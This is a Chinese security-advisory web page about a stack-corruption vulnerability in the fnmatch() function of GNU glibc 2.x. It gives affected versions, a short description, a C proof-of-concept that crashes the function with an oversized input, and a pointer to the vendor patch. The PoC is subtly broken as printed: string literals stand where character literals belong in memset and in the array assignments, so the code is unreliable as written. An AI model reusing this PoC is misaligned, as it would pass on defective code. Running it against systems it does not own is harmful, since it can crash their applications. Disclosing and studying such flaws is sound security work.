Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / GNU glibc “fnmatch()”函数栈破坏漏洞

GNU glibc "fnmatch()"函数栈破坏漏洞发布日期:2011-02-25
更新日期:2011-02-25受影响系统:
GNU glibc 2.x
不受影响系统:
GNU glibc 2.12.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 46563glibc是绝大多数Linux操作系统中C库的实现。glibc在实现上存在漏洞,攻击者可利用此漏洞在使用受影响库的系统中执行任意代码,使应用程序崩溃。漏洞源于"fnmatch()" 函数的实现中存在错误,可通过特制的输入造成栈破坏。<*来源:Simon Berry-Byrne
 
  链接:http://www.sourceware.org/bugzilla/show_bug.cgi?id=11883
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Simon Berry-Byrne ()提供了如下测试方法:#include <err.h>
#include <fnmatch.h>
#include <locale.h>
#include <stdlib.h>
#include <string.h>int main(int argc, const char* argv[]) {
  size_t num_as;
  char* p;
  setlocale(LC_ALL, "en_US.UTF8");
  if (argc < 2) {
    errx(1, "Missing argument.");
  }
  num_as = atoi(argv[1]);
  if (num_as < 5) {
    errx(1, "Need 5.");
  }
  p = malloc(num_as);
  if (!p) {
    errx(1, "malloc() failed.");
  }
  memset(p, "A", num_as);
  p[num_as - 1] = "";
  p[0] = "f";
  p[1] = "o";
  p[2] = "o";
  p[3] = ".";
  fnmatch("*.anim[1-9j]", p, 0);
  return 0;
}建议:
--------------------------------------------------------------------------------
厂商补丁:GNU
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.gnu.orgCisco Secure Desktop ActiveX控件可执行文件任意文件下载漏洞Samba “FD_SET”内存破坏漏洞相关资讯      Linux漏洞 
  • 敲击28次退格键之后:Linux漏洞可  (12/18/2015 11:22:28)
  • Linux出现重大漏洞 GHOST ?  (01/30/2015 18:35:07)
  • Linux 2.6.31本地代码执行漏洞(  (07/07/2014 07:51:17)
  • Red Hat Linux 修补“libuser”库  (07/26/2015 06:39:34)
  • 红帽反驳:“Grinch(鬼精灵)”算  (12/30/2014 07:38:23)
  • Linux gcc++漏洞:普通用户获得  (08/16/2013 11:57:41)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款